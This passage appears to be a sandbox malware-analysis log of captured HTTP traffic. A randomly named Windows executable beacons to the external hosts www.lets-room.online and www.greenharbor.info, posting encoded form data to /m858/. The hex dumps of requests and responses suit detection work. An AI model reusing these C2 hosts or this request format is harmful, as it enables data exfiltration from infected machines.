                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      12192.168.2.114972369.57.161.215802016C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 15:53:43.694645882 CET443OUTGET /m858/?yRV=l3PhQIcXSIPbTWu7p/uiREsJUVtNOEFcSOOLMhvnuN6H7BalBQjl+86I6Nr3Qdue789gEwulMvGUQuhGePztwTHWY2ExuMUqrQ==&GJ=C4IdWhJXSFOXR8D HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.greenharbor.info
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Dec 7, 2023 15:53:43.992939949 CET548INHTTP/1.1 404 Not Found
                                                                                                                      Date: Thu, 07 Dec 2023 14:53:43 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 389
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      13192.168.2.1149724194.58.112.174802016C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 15:53:49.709655046 CET716OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.lets-room.online
                                                                                                                      Origin: http://www.lets-room.online
                                                                                                                      Referer: http://www.lets-room.online/m858/
                                                                                                                      Content-Length: 184
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 79 52 56 3d 44 52 56 33 4d 75 43 64 4c 54 58 61 39 30 45 6f 32 2b 79 51 72 6b 32 43 58 67 2b 41 43 41 61 5a 57 35 61 62 5a 38 41 31 50 5a 54 63 78 65 4e 2f 45 6d 38 4b 6b 32 70 4b 6c 71 42 34 30 61 65 34 57 55 51 6e 68 38 78 56 72 74 35 49 4e 66 77 71 7a 75 6d 71 66 74 35 6a 6f 70 4e 33 43 5a 2b 6b 7a 7a 36 38 6f 43 34 48 61 53 71 63 6c 2f 62 32 59 50 53 42 65 72 44 43 54 52 42 6f 6f 6d 4f 34 39 34 58 51 4b 4f 5a 46 49 6a 6e 36 61 36 42 75 36 38 52 6d 2f 78 34 42 6d 62 53 76 32 54 65 41 36 42 65 70 72 6e 34 42 34 79 53 6e 44 75 77 56 54 67 3d 3d
                                                                                                                      Data Ascii: yRV=DRV3MuCdLTXa90Eo2+yQrk2CXg+ACAaZW5abZ8A1PZTcxeN/Em8Kk2pKlqB40ae4WUQnh8xVrt5INfwqzumqft5jopN3CZ+kzz68oC4HaSqcl/b2YPSBerDCTRBoomO494XQKOZFIjn6a6Bu68Rm/x4BmbSv2TeA6Beprn4B4ySnDuwVTg==
                                                                                                                      Dec 7, 2023 15:53:49.994836092 CET1286INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Thu, 07 Dec 2023 14:53:49 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Content-Encoding: gzip
                                                                                                                      Data Raw: 65 33 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 55 14 1a 81 ef 0f 4c df 73 1d 4f d5 2d 5d 57 c7 97 be 08 94 db 28 85 d1 d8 55 61 4f 29 4c 33 50 1d 47 36 4a d2 75 4b a2 17 a8 8d 5c 58 16 ce 90 a3 c8 37 ed 30 c4 14 93 fe 0e 96 91 b5 de 90 90 cb f7 4c fc 59 5d 2e 09 d2 1f d4 35 90 5d 65 5d 31 b8 61 b3 1e da 81 33 8c 9a d6 b1 fa d1 f5 f3 17 ce 5d 3a b7 7e cc 3a b2 e5 78 1d 7f cb 8c 02 69 f7 d7 b8 c1 45 5f 76 44 43 6c 8c 3c 3b 72 7c af 52 bd 7a 7d e5 88 75 ec f2 e5 e6 31 ab 6e a5 83 a4 83 09 2c 0e cd 1b a5 f9 c3 54 ca d6 40 7a ce 86 0a 23 f3 dd b0 5c 2d a1 bd 0a 02 3f 38 64 87 9a 58 46 9f 30 b0 1b a5 e2 40 b0 4a 66 e5 51 b4 c1 56 7e 66 b9 08 32 30 1c 69 24 3c b4 6c b3 9d 8a f2 cd d4 1d 24 a3 a5 f1 da f6 3b e3 0c d9 6d 63 08 5b 09 fd af 45 e6 6b a5 68 e5 32 c6 ed e4 53 ab dd 6d b9 4e b7 17 01 0f 34 96 0a 8a e3 70 e3 56 2b ad a0 21 a7 4a f4 e8 29 e6 3b ce e6 c2 ae 86 e7 47 24 52 a4 ae 60 a2 f8 eb 78 2f 7e 14 ef c4 8f 45 fc 6d 7c 27 79 1f 1f ef c5 bb c9 07 c9 0d 7c de c5 ef 5e bc 1d df a1 ea ed 25 af 1d 0e 57 ea f0 46 ed b7 6d 83 50 9b 61 b5 17 45 c3 f0 ac 65 c1 f9 4c b8 af 76 06 cf df f0 5d d7 df 12 9e ef 0f 15 50 82 0f f0 03 a0 45 05 c0 b3 0c ba e4 d4 ad 36 bc be 0f 61 fe 46 b3 9b c9 fb c9 cd ba 25 9b 75 0b eb 68 d6 67 16 d3 55 ad 56 ea e9 c6 56 20 87 43 0c 9a 2a 78 b6 bc c5 be d8 82 2f 80 16 16 36 62 b3 f4 fc 30 02 89 18 61 24 23 c7 86 01 66 66 9d d2 b5 91 ce 4f 76 5a 9e 68 63 c6 22 06 53 43 69 01 6f f4 96 9b f5 e1 e2 be 1d a5 51 0c 57 7d 76 5b d5 db 41 33 de d5 e6 8a 9f 90 1d e3 27 6c db 07 fb ac 39 a5 f2 e1 a2 65 b7 47 51 e4 7b 61 a6 6f ac bb 00 02 5d 09 29 f5 07 18 c1 f5 83 16 5b 59 79 36 41 2d ad 08 9d f7 54 0b f6 1f 48 97 8d 91 ea 34 ef 9f eb 2f 6d cf 86 01 27 17 86 18 ca 4e 07 66 6a b9 84 9c 59 e4 11 41 6b f4 59 5b 3d df 09 ad 55 bb a7 ec 7e 63 a9 c3 81 62 1e 7f 2f c9 c1 70 05 7d 5a a1 3f 0a 6c d5 c8 44 20 66 2e 35 7f 43 a3 10 12 45 71 bd e4 38 45 f9 99 ba 0b fe 78 f0 7a 3a fe 40 3a 39 c1 67 4e 53 10 5d 37 b0 3c b5 65 ad 8e a2 41 26 d9 5c e9 a9 9e 62 cc 68 90 49 be 44 45 36 56 25 9d ae d7 08 a1 28 af d3 c2 58 07 2f 34 fe 07 80 f1 df 78 47 24 1f c5 7b c9 27 c9 4d 11 df cf 78 e1 68 c1 15 c3 a1 f4 e6 60 76 18 f8 03 df e0 b8 54 54 4c a1 58 b3 53 08 99 80 1d 8b 86 c9 bc 5b fb 38 73 a7 0a 80 ab 00 ee e7 aa e2 24 3f 92 c3 f7 4e 4e 26 65 cf c5 52 f8 7f 8b 71 cb 88 9b 2e 6a 3b dd 57 dc ee fe 32 f8 6e 3f f2 87 45 55 a4 54 10 7f 4d dc 46 04 4b ba be 99 7c 10 3f d4 5f c5 94 1f f6 4e 2e 72 44 56 e9 42 76 4a 15 1e a9 41 71 ee 49 a9 b6 42 46 75 fe a6 0a 28 33 39 70 2e 43 c7 1b 34 fa 9e b6 4f 67 9d 98 bf 40 b0 ae 31 80 3f 3b 5e cb 55 1b 91 a1 7d 1b 13 46 81 ef 75 9f 6e 14 b0 31 e0 6e 53 30 fb 17 d0 8b c8 05 f5 3e 8e ef 01 67
                                                                                                                      Data Ascii: e33Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskktULsO-]W(UaO)L3PG6JuK\X70LY].5]e]1a3]:~:xiE_vDCl<;r|Rz}u1n,T@z#\-?8dXF0@JfQV~f20i$<l$;mc[Ekh2SmN4pV+!J);G$R`x/~Em|'y|^%WFmPaEeLv]PE6aF%uhgUVV C*x/6b0a$#ffOvZhc"SCioQW}v[A3'l9eGQ{ao])[Yy6A-TH4/m'NfjYAkY[=U~cb/p}Z?lD f.5CEq8Exz:@:9gNS]7<eA&\bhIDE6V%(X/4xG${'Mxh`vTTLXS[8s$?NN&eRq.j;W2n?EUTMFK|?_N.rDVBvJAqIBFu(39p.C4Og@1?;^U}Fun1nS0>g
                                                                                                                      Dec 7, 2023 15:53:49.994918108 CET1286INData Raw: 3c c2 14 cf ce 3a af 56 4e 38 6a 6b 93 e7 92 b4 7d 30 de 00 b1 d2 53 18 f7 cf 88 80 f7 93 2f e1 22 8f 93 cf e3 ef 44 4e ae 77 93 cf 75 a8 a4 e2 ba 05 02 4d f1 cc 91 6b 94 a7 b8 05 7a d8 50 32 1a 05 4a 27 7d 93 d5 65 cc d3 ca ea 0d 07 76 24 bd 2f
                                                                                                                      Data Ascii: <:VN8jk}0S/"DNwuMkzP2J'}ev$/PB[$Pzi(wA#`a11wtZD7(.kL,YyZdB'-@VPZcV2cn)
                                                                                                                      Dec 7, 2023 15:53:49.995007038 CET1249INData Raw: 20 c8 79 f9 0e 3e 32 95 df a7 fc 04 3d d9 bb c8 b7 38 05 81 b7 14 0e 96 1e 40 16 1c 2c 80 a6 39 57 cb 63 06 65 26 60 ee 4f 20 6c 3a 23 dd d7 ec 89 b5 d7 de 34 38 a9 c9 33 4d 74 c6 10 e9 de 9c 8f a3 d2 a3 a9 f4 88 15 4c c4 f7 64 4f bd ec 4b 0f 9a
                                                                                                                      Data Ascii: y>2=8@,9Wce&`O l:#483MtLdOKWp62^="?*7^WDF>P8V:_?2u24ZNg82t.T0^S.nEeYTg#)6X^7ySo'_G&]4tuJy


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      14192.168.2.1149725194.58.112.174802016C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 15:53:52.518884897 CET736OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.lets-room.online
                                                                                                                      Origin: http://www.lets-room.online
                                                                                                                      Referer: http://www.lets-room.online/m858/
                                                                                                                      Content-Length: 204
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 79 52 56 3d 44 52 56 33 4d 75 43 64 4c 54 58 61 6e 56 30 6f 7a 5a 65 51 37 30 32 42 4c 51 2b 41 4d 67 61 64 57 35 57 62 5a 2f 4d 6c 4f 76 6a 63 79 38 46 2f 48 6b 45 4b 70 57 70 4b 75 4b 42 78 70 4b 65 2f 57 55 4d 42 68 39 64 56 72 73 64 49 4e 66 41 71 7a 35 79 72 4e 4e 35 39 39 35 4e 31 4e 35 2b 6b 7a 7a 36 38 6f 43 74 6f 61 52 61 63 6c 50 72 32 5a 72 6d 4f 43 37 44 64 55 52 42 6f 6a 47 4f 38 39 34 58 75 4b 50 55 69 49 68 66 36 61 2f 39 75 36 74 52 68 6c 68 34 48 69 62 54 54 7a 32 76 4d 32 42 71 6d 30 46 6b 52 32 56 66 32 50 62 63 47 55 51 54 44 4a 34 48 36 54 78 35 4c 6a 44 75 50 2b 58 36 4a 43 54 49 3d
                                                                                                                      Data Ascii: yRV=DRV3MuCdLTXanV0ozZeQ702BLQ+AMgadW5WbZ/MlOvjcy8F/HkEKpWpKuKBxpKe/WUMBh9dVrsdINfAqz5yrNN5995N1N5+kzz68oCtoaRaclPr2ZrmOC7DdURBojGO894XuKPUiIhf6a/9u6tRhlh4HibTTz2vM2Bqm0FkR2Vf2PbcGUQTDJ4H6Tx5LjDuP+X6JCTI=
                                                                                                                      Dec 7, 2023 15:53:52.806050062 CET1286INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Thu, 07 Dec 2023 14:53:52 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Content-Encoding: gzip
                                                                                                                      Data Raw: 65 33 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 55 14 1a 81 ef 0f 4c df 73 1d 4f d5 2d 5d 57 c7 97 be 08 94 db 28 85 d1 d8 55 61 4f 29 4c 33 50 1d 47 36 4a d2 75 4b a2 17 a8 8d 5c 58 16 ce 90 a3 c8 37 ed 30 c4 14 93 fe 0e 96 91 b5 de 90 90 cb f7 4c fc 59 5d 2e 09 d2 1f d4 35 90 5d 65 5d 31 b8 61 b3 1e da 81 33 8c 9a d6 b1 fa d1 f5 f3 17 ce 5d 3a b7 7e cc 3a b2 e5 78 1d 7f cb 8c 02 69 f7 d7 b8 c1 45 5f 76 44 43 6c 8c 3c 3b 72 7c af 52 bd 7a 7d e5 88 75 ec f2 e5 e6 31 ab 6e a5 83 a4 83 09 2c 0e cd 1b a5 f9 c3 54 ca d6 40 7a ce 86 0a 23 f3 dd b0 5c 2d a1 bd 0a 02 3f 38 64 87 9a 58 46 9f 30 b0 1b a5 e2 40 b0 4a 66 e5 51 b4 c1 56 7e 66 b9 08 32 30 1c 69 24 3c b4 6c b3 9d 8a f2 cd d4 1d 24 a3 a5 f1 da f6 3b e3 0c d9 6d 63 08 5b 09 fd af 45 e6 6b a5 68 e5 32 c6 ed e4 53 ab dd 6d b9 4e b7 17 01 0f 34 96 0a 8a e3 70 e3 56 2b ad a0 21 a7 4a f4 e8 29 e6 3b ce e6 c2 ae 86 e7 47 24 52 a4 ae 60 a2 f8 eb 78 2f 7e 14 ef c4 8f 45 fc 6d 7c 27 79 1f 1f ef c5 bb c9 07 c9 0d 7c de c5 ef 5e bc 1d df a1 ea ed 25 af 1d 0e 57 ea f0 46 ed b7 6d 83 50 9b 61 b5 17 45 c3 f0 ac 65 c1 f9 4c b8 af 76 06 cf df f0 5d d7 df 12 9e ef 0f 15 50 82 0f f0 03 a0 45 05 c0 b3 0c ba e4 d4 ad 36 bc be 0f 61 fe 46 b3 9b c9 fb c9 cd ba 25 9b 75 0b eb 68 d6 67 16 d3 55 ad 56 ea e9 c6 56 20 87 43 0c 9a 2a 78 b6 bc c5 be d8 82 2f 80 16 16 36 62 b3 f4 fc 30 02 89 18 61 24 23 c7 86 01 66 66 9d d2 b5 91 ce 4f 76 5a 9e 68 63 c6 22 06 53 43 69 01 6f f4 96 9b f5 e1 e2 be 1d a5 51 0c 57 7d 76 5b d5 db 41 33 de d5 e6 8a 9f 90 1d e3 27 6c db 07 fb ac 39 a5 f2 e1 a2 65 b7 47 51 e4 7b 61 a6 6f ac bb 00 02 5d 09 29 f5 07 18 c1 f5 83 16 5b 59 79 36 41 2d ad 08 9d f7 54 0b f6 1f 48 97 8d 91 ea 34 ef 9f eb 2f 6d cf 86 01 27 17 86 18 ca 4e 07 66 6a b9 84 9c 59 e4 11 41 6b f4 59 5b 3d df 09 ad 55 bb a7 ec 7e 63 a9 c3 81 62 1e 7f 2f c9 c1 70 05 7d 5a a1 3f 0a 6c d5 c8 44 20 66 2e 35 7f 43 a3 10 12 45 71 bd e4 38 45 f9 99 ba 0b fe 78 f0 7a 3a fe 40 3a 39 c1 67 4e 53 10 5d 37 b0 3c b5 65 ad 8e a2 41 26 d9 5c e9 a9 9e 62 cc 68 90 49 be 44 45 36 56 25 9d ae d7 08 a1 28 af d3 c2 58 07 2f 34 fe 07 80 f1 df 78 47 24 1f c5 7b c9 27 c9 4d 11 df cf 78 e1 68 c1 15 c3 a1 f4 e6 60 76 18 f8 03 df e0 b8 54 54 4c a1 58 b3 53 08 99 80 1d 8b 86 c9 bc 5b fb 38 73 a7 0a 80 ab 00 ee e7 aa e2 24 3f 92 c3 f7 4e 4e 26 65 cf c5 52 f8 7f 8b 71 cb 88 9b 2e 6a 3b dd 57 dc ee fe 32 f8 6e 3f f2 87 45 55 a4 54 10 7f 4d dc 46 04 4b ba be 99 7c 10 3f d4 5f c5 94 1f f6 4e 2e 72 44 56 e9 42 76 4a 15 1e a9 41 71 ee 49 a9 b6 42 46 75 fe a6 0a 28 33 39 70 2e 43 c7 1b 34 fa 9e b6 4f 67 9d 98 bf 40 b0 ae 31 80 3f 3b 5e cb 55 1b 91 a1 7d 1b 13 46 81 ef 75 9f 6e 14 b0 31 e0 6e 53 30 fb 17 d0 8b c8 05 f5 3e 8e ef 01 67
                                                                                                                      Data Ascii: e33Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskktULsO-]W(UaO)L3PG6JuK\X70LY].5]e]1a3]:~:xiE_vDCl<;r|Rz}u1n,T@z#\-?8dXF0@JfQV~f20i$<l$;mc[Ekh2SmN4pV+!J);G$R`x/~Em|'y|^%WFmPaEeLv]PE6aF%uhgUVV C*x/6b0a$#ffOvZhc"SCioQW}v[A3'l9eGQ{ao])[Yy6A-TH4/m'NfjYAkY[=U~cb/p}Z?lD f.5CEq8Exz:@:9gNS]7<eA&\bhIDE6V%(X/4xG${'Mxh`vTTLXS[8s$?NN&eRq.j;W2n?EUTMFK|?_N.rDVBvJAqIBFu(39p.C4Og@1?;^U}Fun1nS0>g
                                                                                                                      Dec 7, 2023 15:53:52.806119919 CET1286INData Raw: 3c c2 14 cf ce 3a af 56 4e 38 6a 6b 93 e7 92 b4 7d 30 de 00 b1 d2 53 18 f7 cf 88 80 f7 93 2f e1 22 8f 93 cf e3 ef 44 4e ae 77 93 cf 75 a8 a4 e2 ba 05 02 4d f1 cc 91 6b 94 a7 b8 05 7a d8 50 32 1a 05 4a 27 7d 93 d5 65 cc d3 ca ea 0d 07 76 24 bd 2f
                                                                                                                      Data Ascii: <:VN8jk}0S/"DNwuMkzP2J'}ev$/PB[$Pzi(wA#`a11wtZD7(.kL,YyZdB'-@VPZcV2cn)
                                                                                                                      Dec 7, 2023 15:53:52.806169033 CET1249INData Raw: 20 c8 79 f9 0e 3e 32 95 df a7 fc 04 3d d9 bb c8 b7 38 05 81 b7 14 0e 96 1e 40 16 1c 2c 80 a6 39 57 cb 63 06 65 26 60 ee 4f 20 6c 3a 23 dd d7 ec 89 b5 d7 de 34 38 a9 c9 33 4d 74 c6 10 e9 de 9c 8f a3 d2 a3 a9 f4 88 15 4c c4 f7 64 4f bd ec 4b 0f 9a
                                                                                                                      Data Ascii: y>2=8@,9Wce&`O l:#483MtLdOKWp62^="?*7^WDF>P8V:_?2u24ZNg82t.T0^S.nEeYTg#)6X^7ySo'_G&]4tuJy


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      15192.168.2.1149726194.58.112.174802016C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 7, 2023 15:53:55.325917959 CET1749OUTPOST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.lets-room.online
                                                                                                                      Origin: http://www.lets-room.online
                                                                                                                      Referer: http://www.lets-room.online/m858/
                                                                                                                      Content-Length: 1216
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
                                                                                                                      Data Raw: 79 52 56 3d 44 52 56 33 4d 75 43 64 4c 54 58 61 6e 56 30 6f 7a 5a 65 51 37 30 32 42 4c 51 2b 41 4d 67 61 64 57 35 57 62 5a 2f 4d 6c 4f 76 72 63 79 4a 52 2f 46 44 51 4b 6f 57 70 4b 6e 71 42 38 70 4b 66 36 57 55 45 64 68 39 68 6a 72 75 56 49 4d 38 49 71 6e 62 4b 72 55 39 35 39 6c 4a 4e 30 43 5a 2b 39 7a 7a 71 77 6f 43 39 6f 61 52 61 63 6c 4e 7a 32 4e 50 53 4f 41 37 44 43 54 52 42 73 6f 6d 4f 55 39 34 76 2b 4b 50 52 56 49 52 2f 36 61 66 4e 75 31 37 39 68 75 68 34 46 76 37 54 4c 7a 32 71 4f 32 42 33 58 30 46 52 30 32 57 50 32 50 38 6f 46 47 6b 62 6d 62 37 66 78 4a 33 70 31 6a 52 65 44 6b 45 79 49 62 48 35 49 76 71 49 4d 36 41 79 38 31 31 4d 2f 35 56 2b 68 37 4d 38 6f 51 61 64 2f 47 63 2b 44 6b 4d 5a 72 70 39 6d 72 4d 62 6c 45 36 56 4e 59 36 42 34 57 30 71 41 4c 55 41 78 52 51 62 71 35 52 6c 44 58 52 6c 59 34 38 53 4c 48 53 50 61 42 72 5a 76 68 6a 42 63 52 6d 49 69 33 51 5a 38 6b 39 4f 54 51 68 61 7a 38 45 79 73 4a 37 62 4a 44 73 4a 37 5a 46 44 35 30 46 31 71 76 72 55 53 50 54 76 51 51 55 74 71 75 73 6e 4c 6f 63 74 62 58 47 62 63 32 41 36 32 6a 4b 31 64 48 44 39 35 31 54 2f 32 31 73 75 66 68 53 54 63 6e 66 4b 39 4c 68 49 42 75 41 44 43 70 75 4b 39 70 68 6b 73 64 4d 4e 49 4a 35 66 2f 45 48 43 7a 35 38 37 44 77 6b 2f 41 57 75 2b 56 4f 6a 2f 4e 35 67 69 6c 47 4b 73 52 35 6e 7a 62 63 59 48 38 68 4b 4f 62 41 36 41 74 39 4d 39 7a 4c 47 6d 62 62 37 78 79 54 67 70 54 57 